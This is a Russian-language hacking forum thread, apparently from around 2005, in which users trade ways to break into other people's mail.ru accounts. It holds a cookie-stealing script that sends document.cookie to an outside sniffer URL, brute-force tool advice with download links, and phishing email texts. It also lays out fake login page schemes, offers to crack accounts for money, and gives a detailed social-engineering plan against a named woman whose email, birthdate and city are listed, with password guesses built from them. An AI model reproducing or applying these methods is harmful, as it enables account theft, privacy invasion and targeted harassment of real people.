привет
допустим я хочу взломат testtestmail@mail.ru
что я должен писат в писме для жертвы
чтоб cookie писались http://antichat.ru/sniff/log
THANK

что не пиши все равно эта фишка там не прокатит, будет только показан номер мессаги которую он читает

привет
допустим я хочу взломат testtestmail@mail.ru
THANK

Брутом или СИ.

Помогите пожалуйста получить пароль от flirtation@mail.ru
пробовал БРУТОМ, ничего не выходит, какой то заумный пасс придумал.

Если чел ламоват - СИ. Или посимвольный брут с разделением труда на нескока серверов =)

Если чувак лол, попробуй ему послать форму подтверждения пароля =)))

Пошли ему письмо в ХТМЛ формате со скриптом для кражи куки)))
Нужно... чтобы это письмо открыли в хтмл формате)))

Вот скрипт:

<script>img=new Image(); img.src='Адресс сниффера...вернее его описание'+document.cookie;</script>


Если ты украдёшь куки... то ты не сможешь изменить пароль и т.д.!!!
Ты просто сможешь лазить в его почте и по другим ресурсам майл.ру под его ящиком (чат.майл.ру, фото.майл.ру и т.д. и т.п.)

Но это ненадолго(((

неа, не прокатывает...

>>Пошли ему письмо в ХТМЛ формате со скриптом для кражи куки))) (Соц. инженерия)
а кто сказал что этот способ соц. инженерия???
>>Нужно... чтобы это письмо открыли в хтмл формате)))
Обязательно то что надо ПОСЛАТЬ письмо в хтмл формате

неа, не прокатывает...
Не прокатывает? Может это письмо ещё не открыли?
Вот пример скрипта на античатовском сниффере

<script>img=new Image(); img.src='http://antichat.ru/cgi-bin/s.jpg'+document.cookie;</script>


Попробуй

когда открывают письмо - то на сниффере вообще пусто... даже не отображается ничего ка-будто ничего и не открывали...
Письмо ввиде хтмл посылал...

А они его через веб интерфейс открывают???

Может быть это письмо отправлене не в хтмл формате???

Скажи пожалуйста...
Когда письмо на тот ящик пришло скрипт видно было?
Если было видно... то скорее всего майл.ру эту дырку закрыла (((
Но это прокатит на других серваках )))

естественно эти скрипты фильтруются системой, пошлите это сами себе и посмотрите во что превратился код письма =)

Динар этот хсс уже давно закрыт!!какой ты наивный))))

Наивный?
Я просто давно не пробовал... Думал, что всё ещё работает(((

письмо открыли 100%

Набери в поисковике нужный имаил... Быть может он зарегился на каком нить тупом форуме, который легко взламывается... (phpBB или другой) Сломай... Потом возьми его hash пороля (Быть может он указал пороль на форуме, такой же как и на мыле)... Расштфруй и все )))

А вот у меня мыло сломали сегодня (((
Обидно (((

Помогите пожалуйста получить пароль от flirtation@mail.ru
пробовал БРУТОМ, ничего не выходит, какой то заумный пасс придумал.


что за времена, до сих пор надеються на перебор паролей.

узнай у того чувака или чувихи какое у него или у нее любимое блюдо.
если ты с ним знаком думаю для тебя это не составит труда.
как узнаешь что за жрачку он любит иди вот по этой ссылке
http://win.mail.ru/cgi-bin/passremind

думаю дальше разберешься.....

эээхххх кто бы мне вот так объяснял бы=), в свое время...да и ша не помешало бы

узнай у того чувака или чувихи какое у него или у нее любимое блюдо.
если ты с ним знаком думаю для тебя это не составит труда.
как узнаешь что за жрачку он любит иди вот по этой ссылке
http://win.mail.ru/cgi-bin/passremind

думаю дальше разберешься.....

Всё это уже все знают

хы, я ся предсавляю, когда мое мыло кто нить закажет, стучат ко мне 63 человека и все хотят узнать что я есть люблю :d хаха -))

или имя псины и кошки, что нить еще...
епать... как глупо =))

ндя.... а всё -таки что делать если ну ника не узнать ответа? поисковик не выдаёт ничего.... а очень надо... очень при очень...

Брутофорсь!!!
Я 2 дня назад себе своё сломанное мыло вернул )))
Целую ночь брутил )))
Не ожидал, что получится)))
Зато какое счастье )))!!!...!.)

динар, чем брутфорсил?

Забыл название прги!!!
Как вспомню...сразу напишу!!!
Просто в ней вирус был и я её сразу удалил (((

Brutus AET2 или wwwhack
и не вирус, а просто антивирь орет что это, типа, хакерская тулза.
Хотя... если брать не с оф.сайта, то вполне мог быть и вирус.

Это был вирус... поверь мне!!!

хм... ты все файлы запускаешь, когда антивирь орет что вирь или троян обнаружен? зачем тебе тогда антивирус?
Это знаешь как в старом анеке:
ДОРОГОЙ ПОЛУЧАТЕЛЬ!
Вы получили вирус Талибана. Так как у нас в Афганистане не хватает технических средств, данный вирус - ЗАПУСКАЕТСЯ ВРУЧНУЮ.
Пожалуйста, удалите все файлы на Вашем жестком диске и перешлите этот текст каждому своему знакомому.
Спасибо Вам большое за помощь.
Абдулла, Хакер движения Талибан.

ГЫ: :-D
Седня получил мыло, ржал гдет час =)....че за чурка думаю...
Ладно, я ещё проверил заголовки письма, там IP ваще со Средней Азии =)

А вот и полученное мыло:

От кого:
Администрация Mail.ru <accountverifying@mail.ru>
Кому: Пупкин_Вася@mail.ru
Дата: 08 Июл 2005 21:44:24
Тема: Верефикация ващего пароля

Здравствуйте!
Мы рады приветствовать Вас в рядах пользователей национальной почтовой службы Mail.Ru!
В целях смены дизайна интерфейса почтовой службы Mail.ru, просим Вас, верефицировать свой почтовый акаунт.
Для выполнения верефикации достаточно прислать верификационный номер с текущим паролем вашего аккаунта на accountverifying@mail.ru.
Ваш верификационный номер: 22568849АB
Внимание!!! Те акаунты которые не будут верефицироваться в течении 10-и дней, будут блокированны с далнейшим потерием данных.
Спасибо за то, что Вы являетесь пользователем Mail.Ru.
С уважением, администрация Mail.Ru


=)

Смотрите какое мне на днях письмо прислали !!! Даже на 2-х языках написали )))


От кого: support support <supportmysupport@mail.ru>
Кому: ***@mail.ru
Дата: 04 Июл 2005 10:26:34
Тема: Внимание! Ваш ящик был взломан!!!/Attention! Your box has been broken open!!!



Внимание!
03.07.2005 в 23:23:43 был осуществлен двойной доступ на ваш аккаунт.
Это может быть следствием взлома Вашего почтового ящика.
Для повышения уровня безопасности Вы можете сменить пароль вашего аккаунта.
Для этого на адрес supportmysupport@mail.ru вышлите письмо с темой "Change"
и содержанием:

login: Ваш_логин
op: старый пароль
np: новый пароль

Спасибо за вашу бдительность!
С уважением, администрация mail.ru

----------------------

03.07.2005 at 23:23:43 double access on your account has been carried out.
It can be consequence of breaking of your letter box.
For increase of a level of safety you can replace the password of your account.
For this purpose on the address supportmysupport@mail.ru send the letter with a theme "Change"
And the contents:

login: your_login
op: old password
np: new password

Thank for your vigilance!
Yours faithfully, administration mail.ru

Отсюда у меня возник ещё вопрос!!! Почему бы мне просто нельзя было-бы сменить пароль через настройки??? Ха ха

нда... если енто все будут писать то на хосте античата кончица место из-за того что скулбаза все сожрет =))

Green_Bear, а на то тут это тема =) люди тут видишь ли учатса ящики на мыло.ру ломать =) и обсуждают способы...
ЗЫ:

нда... если енто все будут писать то на хосте античата кончица место из-за того что скулбаза все сожрет =))

На этом, я с тобой согласен...

ну этот способ актуален на всех сервисах...и чел должен быть полным ламером, чтоб ответить =)
я адреса на которые слать, с которых приходят подобные письма в ингор ставлю =)

Люди, научити ломать мыльники ПОЖАЛУЙСТО(((

Варианты взлома были написаный на верху.... отправлякшь письмо =)) епать... лол

Подскажите кто знает, у меня перестал работать Брут для mail.ru версия 0.3. Первый запрос идет а ответа нет. :(

Приветы...
Ребята подскажите чем можно расшифровать кукисы ? Мне нужно узнать из них имя и пароль...)
Спасибо)

Приветы...
Ребята подскажите чем можно расшифровать кукисы ? Мне нужно узнать из них имя и пароль...)
Спасибо)
там нет пароля

там нет пароля

Блин...Жаль....У меня есть кукисы от мыла (мэил.ру)
одного человека и хотел попытаться зайти в его ящик....Слышал что их можно как то скормить , но каму )гы) и как не знаю.........) :)
И можно ли мне как то с помощью чужих кукисов что нибудь такое сделать , нехарошее? )

Блин...Жаль....У меня есть кукисы от мыла (мэил.ру)
одного человека и хотел попытаться зайти в его ящик....Слышал что их можно как то скормить , но каму )гы) и как не знаю.........) :)
И можно ли мне как то с помощью чужих кукисов что нибудь такое сделать , нехарошее? )
их можно подделать =)
легче всего это делать в Mozill-e или используй програмку minibrowser

Майор

Так мне не надо их подделывать...У меня они есть....Есть кукисы с чужова компа....Я могу как то воспользоваться ими для входа в ящик чела у кого я увёл эти кукисы?
Спасибо...)

Помогите пожалуйста получить пароль от flirtation@mail.ru
пробовал БРУТОМ, ничего не выходит, какой то заумный пасс придумал.

будет стоить 5 $, пасс получишь сразу же.
с уважением.

За 8$ логин и пароль и все письма, что в ящике. Кого интересует?

меня интересуте. huyandex@bk.ru , как добудеш пасс я пришлю проверочное письмо, ты скажешь что я прислал, после перевожу ВМ.

Green_Beer - а еще лучше, чтобы вы он-лайн были и тогда он тебе сказал что ты прислал. А то народ выпрашивает у владельца письмо. Типа "мы знаем что к вам по ошибке попало наше письмо, перешлите его пожалуйста нам. спасибо."

аха... мне уже штуки 3 подобных приходило.

За 8$ логин и пароль и все письма, что в ящике. Кого интересует?
Как с тобой связаться кроме форума? :confused:

ААА.Не кого нехочу обидеть...НО не надо ломать чужие ящики. Я браться не буду. Я могу взяться и обмануть всех. Поэтому прошу извинить, но если надо что-то сделать - делайте это сами.
P.s.Для вопросов в личку

Не кого нехочу обидеть
мля, ты меня ТАК ОБИДел, что я щас с крышы пойду прыгать с горя.
Я могу взяться и обмануть всех.
Тебе давно в баню пора.

Да ладно стебаться.Green_Bear лидай мыло в личку, что-нибудь сделаем. Работаю без предоплати всяких там идиотских штучек

зачем в личку то? я же написал раньше, huynadex@bk.ru мыло.

Короче чуваки раскажу я вам способ взлома мыэйл ну короче всех систем которые работают с веб!ну а если вы знвете что чувак через клиент письма открывает то не фига не выйдет=)

Короче делаете потделку командной строки !
Что бы было так типа в браузере написана например www.mail.ru а по настоящиму вашь сайт!Который я вам советаю на www.nm.ru делать так как рекламы там нет=)

После этого делаете спецальную страничку таку как мэл ру!
отправляете скрипт в штмл и всё!

Чувак открывает письмо его выбрасывает на вашь сайт он вводит логи пасс и этим действием отправляет даные на ваше мыло!
а потом сделать ссылку на его почту чувак подумает что он зашёл и всё нормально=)
Вот такая вот фигня!У меня всегда получалась!
======================================
Ладно короче всем удачи!

Идея, стара как мир. Но всё равно респект
З.Ы. В отличие от меня понты не кидаешь, а дела предлагешь :)

Короче делаете потделку командной строки !

После этого делаете спецальную страничку таку как мэл ру!
отправляете скрипт в штмл и всё!

Чувак открывает письмо его выбрасывает на вашь сайт.

Ну и как ты сейчас подделаешь адресную строку? И какой скрипт преминить чтобы чела выкинуло на твою страницу? Сейчас такой уязвимости нет на маил.ру . А твой способ слишком древний.

Драствуйте дорогие хацкера . . . я тут седня первый день , и вот увидел такую интерестную тему , которая тоже меня оч. сильно волнует . . .
могу вам рассказать как я прикалываюсь над своими друзями (по поводу получения их пасса) . . .
И ТАК СЛУШАЙТЕ ВНИМАТЕЛЬНО : далеко не самый хакерский взлом , но на ламерах работает 100% : 4\5 как минимум

ТАК КАК БОЛЬШИНСТВО ЛЮДЕЙ , А В ОСНОВНОМ ЕТО ОБЫЧНЫЕ ЮЗЕРЫ - ОЧЕНЬ ЛЮБОПЫТНЫ , ТО КОНЕЧНО НА ВОПРОС ОТ ДРУГА - ХОЧЕШЬ Я НАУЧУ ТУБЯ КАК ЛОМАТЬ ПОЧТУ - ВСЕ ОДНОЗНАЧНО ОТВЕЧАЮТ - = ДАДАДА , КОНЕЧНО = - ... ТО ВОТ И САМИ НА ЕТОМ НАПАРЫВАЮТСЯ !!!!!!!

ЕТОТ СПОСОБ Я ГДЕ ТО ПРОЧИТАЛ и ОН НАВЕРНЯКА ДОВОЛЬНО СТАР :

ВООБЩЕМ ЕСЛИ ВАШ ДРУГ (лучше ламер) СИДИТ НА mail.ru ТО СОЗДАЕМ ПОЧТОВИК НАПРИМЕР pass_repear@mail.ru , А ПОТОМ ОБЪЯСНЯЕМ НАШЕМУ ДРУЖКУ , ЧТО ТИПА ЧТО Б ВЗЛОМАТЬ ПОТУ НАДА ОТПРАВИТЬ ТУДА ПИСЬМИЦО В КОНВЕРТЕ С ТАКОЙ ФОРМОЙ В СТРОЧКЕ &тема& НАПРИМЕР : login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=

login : vasy - ето лог того перца которого он хочет обломать , - он его пишет . . .
pass : тот пасс который он хочет узнать . . .
login : hacker - ето его реальный логин . . .
pass : qwerty - его реальный пасс

ВОТ ЭТО ВСЕ ОН ОТПРАВЛЯЕТ ВАМ НА МЫЛО , А САМ ДУМАЕТ , ЧТО РОБОТ СЧА ОБРАБОТАЕТ ЕГО ЗАПРОС И ПРИШЛЕТ ЕМУ РЕАЛЬНЫЙ ПАСС ... но ЕГО ПАСС ПРИХОДИТ К ВАМ .... А ДАЛЬШЕ ЧТО С НИМ ДЕЛШАТЬ - РЕШАЕТЕ ТОЛЬКО ВЫ , А ОН СИДИТ И ЖДЕТ ПАСС СВОЕГО ДРУГАНА ВАСИ ПУПКИНА ... ПОСЛЕ КАК ОН ЕГО НЕ ДОЖДАЛСЯ , ПОРАССТРАИВАЛСЯ ЧУТОК , И ВЫШЕЛ ИЗ ПОЧТЫ , - ВЫ ТАК "ЧИСТО-СЛУЧАЙНО" ЗАХОДИТЕ В ЕГО ЯЩИК И МЕНЯЕТЕ ПАСС :) вот и всЕ!!!!

большое пасибо за внимание !!!!! вот и се

Этому способу уже 34 года, и щас мало кто на это ключин, процента 2...

Да-да... Заткнете ему рот! Я во так крикну! Таких мыльников уже не зарегаешь!!!! Уже все умники по этому способу зарегали всё что мона!

ВЫ откуда с этими способами объявились? лол)

че вы разорались ??? я просто советую ... а насчет 2-ух процентов - вы не правы ... я ж говорю - на ламерах и простых юзерах все что угодно сработает - даже такая чушь !!!!!! я скока пробовал - все верили - и присылали мне пассы - могу дать пасс одной аськи , если не верите ... ето правда чувак из бывшего клана - но мне пох ... еще так мыло у своей подруги "хацкнул" ... под каким то предлогом - я уже не помню ...

2 vorishka - таких мыльников еще дохера свободных ...

Нет, народ, 2 процента это мало, 25% - это более правдиво. Просто вы ставите себя на их место и понимаете что это лажа, а ламеры клюют, я помню мыл штук 17 схватил, разместив это на форуме хак тимы.

Короче вот ещё интересный способ котором 3 года назад весь мэйл сломать можно было но я мудак им расказал и обломался с баблом из за этого я им мщу!Короче брал я Ip Этого сервака и ставил за место прокси под 80 портом!Получалось что какую страничку я не наберу паподал в админку к мэйлу=)
==========================================
Такая вот лажа пацаны=)Тока я догадался!

имхо песдёшь

ИМХО да =)))) даже нормально врать не можешь)
Короче брал я Ip Этого сервака и ставил за место прокси под 80 портом!Получалось что какую страничку я не наберу паподал в админку к мэйлу=)
вот как..значит ставишь проксю - ип мэйл.ру и какую страницу не набираешь все равно попадаешь в админку мейла.ру..лол поглупее нельзя было?

ИМХО анекдот =))

Я извиняюсь за свою глупость. Скажите, что такое сниффер и как при помощи его украсть куки????

Может кто-нибудь пояснить (по-подробней) с настройками BrutusA2 к майл.ру??
чё-то ничего не получается=((
СПАСИБО!!

brutus-AE2 прога замудрёная , я вот скока не пробую один раз своё мыло ловит пороль потом повторно пропускает, она не надёжная

....каким брутом mail.ru брутфорсить??

brutus-AE2 прога замудрёная , я вот скока не пробую один раз своё мыло ловит пороль потом повторно пропускает, она не надёжная
Может ты не так что делаешь? Если бы она не была надежной, ты бы о ней не знал.

Чебурашка, http://flood3r.com/files/mail.ru.rar

Набери в поисковике нужный имаил... Быть может он зарегился на каком нить тупом форуме, который легко взламывается... (phpBB или другой) Сломай... Потом возьми его hash пороля (Быть может он указал пороль на форуме, такой же как и на мыле)... Расштфруй и все )))

А ты не мог бы объяснить как взломать форум phpBB сначало?и узнать код?

2 bezdelnik для брута форумов много написано в разделе увяз. форумов... Там все ясно сказано..

From support@corp.mail.ru Fri Aug 26 13:07:37 2005
Return-path: <support@corp.mail.ru>
Received: from [**.***.***.***] (port=**** helo=support)
by mx1.mail.ru with asmtp
id 1E8aBU-000LNo-00
for mhpo@mail.ru; Fri, 26 Aug 2005 13:07:36 +0400
Date: Fri, 26 Aug 2005 13:02:36 +0400
From: support@corp.mail.ru
X-Mailer: The Bat! (v3.0.1.33) Professional
Reply-To: support@corp.mail.ru
X-Priority: 3 (Normal)
Message-ID: <154209339.20050826130236@corp.mail.ru>
To: mhpo mhpo <mhpo@mail.ru>
Subject:
=?koi8-r?Q?Re=5B10=5D=3A_=F0=CF=D6=C5=CC=C1=CE=C9=D1_=C9_ =F0=D2=C5=C4
=CC?=
=?koi8-r?Q?=CF=D6=C5_=CE=C9=D1_=D0=CF_=D5=D3=CF=D7=C5=D2= DB=C5=CE=D3=
D4?=
=?koi8-r?Q?=D7=CF=D7=C1_=CE=C9=C0_=D2=C1=C2=CF=D4=D9_=D0= CF=DE=D4=CF=
D7?=
=?koi8-r?Q?=CF=CA_=D3=C9_=D3=D4=C5=CD=D9_-_mhpo=40mail=2Eru?=
In-Reply-To: <E1E8Grk-000Jsx-00.mhpo-mail-ru@f39.mail.ru>
References: <1229008940.20050825124250@corp.mail.ru>
<E1E8Grk-000Jsx-00.mhpo-mail-ru@f39.mail.ru>
MIME-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encodin
g: quoted-printable


Вот думою что можно сетим сделать ?

Бля вы все будите ломатть голову но так никто и неможет сламать mail.ru это факт... есть другой метод надо достать админа...
Пишите владельцу мыла какое нить письмо, все равно с каким содержанием, но лишь бы хозяин мыла ответил. Если это какой нить "чудо-крутой хакер", то что нить типа: "Слушай, а ты в натуре можешь сайт сломать??? http://www.microsoft.com/ не твоя работа???" и так далее в этом духе...;-) Если Веб-мастер, то что нить типа: "Мне так нравится как ты пишешь! А у тебя JAVA-скрипта нету, что б он там что то делал???"...По фигу ЧТО, главное что б от него назад ответ пришел. В принципе эта вся процедура была только для того, что б узнать ИМЯ_ФАМИЛИЮ (или ник) и место расположения "клиента". То бишь если по ентому мылу находится аська, то смотрим инфу в аське, город (если не прописан в аське, то по ИП), имя, возраст и зип. Потом пишешь админу мыльного сервака (у любой мыльной системы есть админ, и у 99% www-шные сервера), обычно это адреса admin@provider.com и support@provider.com. Так вот... Пишешь письмо (очень желательно через www-браузер, например от www.mail.ru или www.hotmail.com) и через анонимную проксю. Это для того что б в заголовке пакета был ИП прокси. Так.... для секьюрити... ;-) Так вот. В теле письма пишешь, что так и так... Злобные хакеры украли у тебя мыло, а тебе очень нравится их служба, сервис, скорость работы, безглючность и все такое... Что ты никогда не променяешь ихний сервис, и что они вообще самые крутые мыльщики! Указываешь ИМЯ, ФАМИЛИЮ, ЗИП, ГОРОД, Телефон (от балды) или что они там еще просят.... Ессено назад придет письмо, что "Информация не совпадает с введенной при регистрации и все такое...". Но ты будь настойчивей! Пиши назад, что ТО_ЧТО_ТЫ_ИМ_ВЫДАЕШЬ - ЕДИНСТВЕННАЯ ВЕРНАЯ ИНФОРМАЦИЯ о ТВОЕМ аккаунте! И повторяешь им ту же инфу, что и первый раз. И так пока админ не сломится...но не забывай каждый раз расхваливать их сервис! ;-) Обычно раз на 7-10 прокатывает... ;-) У меня был даже раз случай, когда один буржуйский админ "отдал" мне мыло, где (как потом оказалось) инфа прописанная в мыле ВООБЩЕ не соответствовала той что я ему ВЫДАВАЛ якобы за владельца аккаунта!
Так что дерзайте, тут главное БОЛЬШЕ фантазии и упорства! Но и о безопасности не забывайте!...

А есть ещё один
Посложнее, но все равно общедоступный. Почти в каждом мыльном сервисе есть служба что типа "Foggot Password?" Так вот...Заходим туды (предварительно не забыв изменить атрибуты филе cookie_для_этой_службы на ReadOnly). Там обычно ОЧЕНЬ простые вопросы... Если повезет , то вопрос будет (к примеру на мыло.ру) "В каком городе ты родился"? В первом способе описано как узнавать город юзверя по мылу , так что на этом не бум останавливаться .Ну и вопросы бывают "кустомайзские"- типа "2000" , ответ обычно такойже..;-) А вот если что нить типа "Как зовут мою собаку?" , то читай ниже...
Открываем эту страницу (ну где вводить надо ответ на секретный вопрос , не догоняешь что ль???;-)) итам в HTML-просмотре ищем строчкутипа : form action="/cgi-bin/3970.dll?secquest" итд... Так вот... Если урл мыла http://www.mail.ru , то полный урл места куда отправляется"секретный ответ" будет http://www.mail.ru/cgi-bin/3970.dll?secquest. Этот урл вводишь вместе с индефикатором Вопроса в программу типа WWWHack. Идентификатор вопроса находится там же где и form action="/cgi-bin/3970.dll?secquest, только чуть дальше . Потом в эту программу или загружаешь встроенный wordlist c паролями или пишешь свой по конкретной тематике, это зависит от вопроса . И вперед! Запускаешь и ждешь...
Так что тут тоже нужно терпение и хоть базовые знания HTML.

Так то оно так. В теории. Но прокатит на богом забытых почтовых службах - и кому они нужны?
Админа грохнешься уговаривать, брутом секретный вопрос не так то и просто взять по двум причинам: кол-во попыток ограничего, прокси они в черный список заносят, на некоторых (типа яндекса) надо ввести случайно сгенереный код (контрольное число). Так что одними базовыми знаниями Html тут не обойтись.

Инфу о пользователе на мыл.ру можно узнать с помощью мыл.ру агента !!!

Имхо, Брутосом взломать тяжелее, качай Прогу от System'a !

Я смотрю тут все так загорелись сломать mail.ru
ну давайте давайте... посмотрим...

Чебурашка, http://flood3r.com/files/mail.ru.rar


Не работает :confused:

И не будет, потому что старенькое. Баги закрываются от одного часа до суток, долго они не живут =)

Первое с чего я начинаю - с простенького, хоть и старого как мир способа:
у себя на сайте пишем скриптик обработки формы или как я делаю - отправки данных формы на мыло(так себе на мобильник можно отправить и не проверять постоянно появилось ли что-то)...
Потом берем для примера страничку вспоминания пароля на нужном сервере, сохраняя полностью дизайн и все баннеры, переписываем форму для своих целей, потом пишем письмецо какое-то(ну типа уже извесных подтверждений мыл, и пр. ), и указываем ссылку по которой нужно сходить, что б сделать нужное действие, а адресс куказываем http://WWW.MAIL.RU@site.my/?ljjk4b645b63456lb45l6b435hj6bkjh544h56

После WWW.MAIL.RU можно добавить что-то еще замывающее глаза но допустимое в использовании логинов, а свой сайт вызвать из под IP, или что-то неброское....

Тоже на ламмеров расчитано, но практика показала, что процент довольно высокий...

http://WWW.MAIL.RU@site.my/?ljjk4b645b63456lb45l6b435hj6bkjh544h56
Не прокатит. В Ие >=6 баг с собакой прикрыт (синтаксическая ошибка).
В Мозиле орет что это, скорее всего, попытка обмана, Опера - сообщение системы безопасности.

опа...
не следил за новостями...

оно-то всё конечно хорошо! интересно было даже почитать столько инфы про взлом родного мэила! но меня интересует ответ на такой очень важный для меня вопрос: А НА ДАННЫЙ МОМЕНТ можно ли взломать <some_nick>@mail.ru??? и если можно то как? меня-то собсно интересует не взлом как таковой! меня всего лишь интересуют письма в ящике! то бишь мне всего-то навсего нужен password! так вот в НЫНЕШНЕЕ время его можно как-нить стырить?

можно

можно или нельзя меня конечно тоже интересует, но больше меня интересует вопрос КАК!!!!

меня-то собсно интересует не взлом как таковой! меня всего лишь интересуют письма в ящике! то бишь мне всего-то навсего нужен password!

А чтоже значит Взлом?

"Всего-то навсего пароль"))) Интересная комбинация слов...

ну ладно не взлом! а просто обычное тыренье пароля! но я так понимаю что здесь собрался такой контингент народа который только языком чешет! что-нибудь толковое кто-нибудь может предложить или нет? метод, способ, что угодно, что может помочь в узнавании пароля! да хоть обычное веселье выраженное в помощи мне)

а просто обычное тыренье пароля
ну если просто, то сам то чего тут написал о помощи?
Способы тебе писали: брут, СИ, сбор инфы.
Брут - банальный перебор (лучше его осуществлять после сбора инфы)
СИ - социальная инженерия - считай выпрашивание (СИ от и до. От банального втерения в доверие и узнавания ответа на секретный вопрос до заманивания на твою страничку, где обязательным полем для заполнения будет Пароль (будет это Анкета или фэйковая страничка для залогинивания на его почту - решай сам)).
Сбор инфы - может помочь и в бруте, и в Социальной инженерии. Да и так может помочь. Может ты найдешь Форум где он постоянно обитает. Тогда пробуй с Форума пароль утянуть. Повезет - пасс подойдет и от мыла.

Ты бы хотя бы мыло написал, и ещё бы охарактеризовал пользователя-ломоть он или нет?

censored!, тогда другой вопрос: где скачать брутфорс нормальный, чтоб антивирь не орал что архив заражён безбожно! могёшь? кинь ссылу по личке)
СИ - насколько я понял выпрашивание у самого объекта взлома? не получится! я с ней не общаюсь уже год! а чтоб ей позвонить это будет дорого! 5 рублей за минуту (межгород)!

Ван, ящик? да пожалуйста! soniksot2003@mail.ru пользователя охарактеризовать? тоже легко! девушка, зовут Настя, в компах ламер полный! винамп и винрар устанавливали через междугородний звонок по телефону! дата рождения 07.06.1986. город Омск! ещё какие данные нужны?

sHUSTRIk, СИ-это обманывание людей. Пример: создаёшь ящик типа verifypassword@mail.ru(это я к примеру). Пишешь письмо на заумном языке с использованием большого количества слов "верификация", угрожаешь пользователю "блокировкой аккаунта с последующей потерей данных", говоришь фразами, употребляемыми на mail.ru. Короче это дело фантазии. Ламер может выслать пароли, у меня прокатывало.

Мыло, судя по всему, и зарегено в 2003 году? Наврядли она на столько уж ламер.
Если ты ее хорошо знаешь, попробуй ответить на ее секретный "что такое 1999?:"
Зачем звонить по межгороду? Переписывайтесь с ней по мылу. Ты всегда можешь представиться какой-нить ее девушкой-ровесницей (так доверия будет больше и она не будет перед тобой кокетничать и пытаться заинтересовать). Ну и на третьем-четвертом письме в зависимости от темы разговора поплачься. Допустим, она интересуется семилютиковыми плодоножками. Ну вот и бабахай, что засеяли мол вы два гектара свеклой. А тут это сволочь весь урожай сожрала, и у вас в семье наступил мор и голод. Ты похудела и стала очень страшненькой. Но не смотря на это тебя полюбил тракторист Михаил Сергеич (первая твоя любовь), и вы стали жить в добре, радости и счастии. Поэтому 1999 год для тебя очень трагичен с одной стороны и радостен с другой.
Глядишь - она и ответит что у нее в 1999 году было... И расскажет тебе ответ на секретный вопрос. Тока сам не спрашивай. Просто подведи ее к этому году. Ведь не спроста у нее такой вопрос? Значит он для нее чем-то важен.
Да. И сам попробуй угадать что у нее в секретном. Что бы ты запомнил?
Любовь? Первый сексуальный опыт? А может ей просто 12-13 лет было?
Попробуй в качестве пароля ее деньмесяцгод рождения в разных написаниях:
07061986
070686
761986
7686
ееимя1986
ееимя86
и т.п.
Или примени стандартную СИ (как выше уже писали) - пошли письмо от саппорта.
Или сохрани страницу Cosmopoliten (тебе нужен от нее дизайн), оформи как анкету со всякими вопросами (где обязательно должны быть поля имя, логин, мыло, пароль). Обязательно поля мыло и пароль должны быть рядом. Если она ламер, как ты говоришь, у нее подсознательно "включиться" пас дать такой-же как и на мыле.
И засылай ей письмо: "Бесплатная подписка на три месяца от Космополитен. Всего лишь ответьте на вопросы анкеты". Если ты к ней подлезешь как девушка-ровесница, и скинешь ссылку на подписку, шансы что она заполнит анкету увеличиваются.
Вообшем - методов куча и маленькая тележка. Думай и дерзай.
...
Практически на любой софт по бруту Антивири орут что там что-то есть. Но! Когда антивирь орет, ты хоть смотри что он орет. Касперский на многий такой софт так и говорит - это не вирь, а хакерский софт. Но тем не менее лучше такой софт качай с оф.сайта. Так хоть больше вероятность что не поймаешь всякую хню. Хотя - никто не застрахован.
Вот оф.сайт Brutus2a: http://www.hoobie.net/brutus/brutus-download.html

Я вот только что проверил одну фишку на майл ру!! реально работает только незнаю как реализовать.. мысль такова:
как я думаю надо сделать такой вот небольшой гемор с двумя мисьмами....
в первом письме каким либо образом у жертвы надо пставить в "Сервис/Свойства обозревателя/Конфидециальность" высокую безопасность! как это сделать я незнаю, но
тем самым при блокировке куков майл начинает генерировать сессию и следующем заходе в почтовый ящик строка браузера будет выглядить типа:
_http://win.mail.ru/session/99995e6e499f727219050564691d711b0307014f6a5a5e465b 06071c07337716034f48645c182d5943721b4703/start?back=1
Далее в следующем письме надо вложить сниф и узнав адрес строки можно будет войти в ящик..
проверял скопировав адрес строки и запустил на другом компьютере - безпроблем читал письма...

Ещё одна мысль как это сделать: написать письмо с прозьбой дабы невзломали ящик и несмогли украсть кукисы, поставьте мол в "Сервис/Свойства обозревателя/Конфидециальность" высокую безопасность! ну типа этого.. а дальше сниф в руки и лог в....=)

Ещё одна мысль как это сделать: написать письмо с прозьбой дабы невзломали ящик и несмогли украсть кукисы, поставьте мол в "Сервис/Свойства обозревателя/Конфидециальность" высокую безопасность! ну типа этого.. а дальше сниф в руки и лог в....=)
Помести на каком-нить sеcurity сайте (секлаб :)) мульку, мол есть возможность несанкционированного доступа злономеренного к конфиденциальной информации пользователей почтовой системы www.mail.ru.
Уровень риска: критический
Ксплоит: (тут можно от дури написать любой скрипт)
Решение: выставить "Сервис/Свойства обозревателя/Конфидециальность" высокую безопасность

PSalm69 :)
хе хе:)
а впринципе щас в чате написал, многие повелись на эту новость и начали спрашивать как, где и что менять:)
ещё прикольнее будет если в чате на mail.ru эту новость написать, все ламы сразу полезут в настройки!!!

А где взять ваш снифф?

http://antichat.ru/sniff/log.php или скачивай и ставь на свой сайт..

З.Ы. а куда делся раздел с PHP ???

Он в разделе Безопасность Web-приложений.

А если знаешь инфу о чел ИФО, д.р. и тд., но ответа на секретный вопрос, можно что-то сделать?

Ну в принципе на mail.ru есть такая штука, что можно заполнить форму со всякими данными и по идее если все сойдётся, то тебе пришлют новый пароль. Но так как это проверяют админы, то редко такое получается-если только у админа будет очень хорошее настроение. А так...можно попробовать ответить на секретный вопрос...или СИ...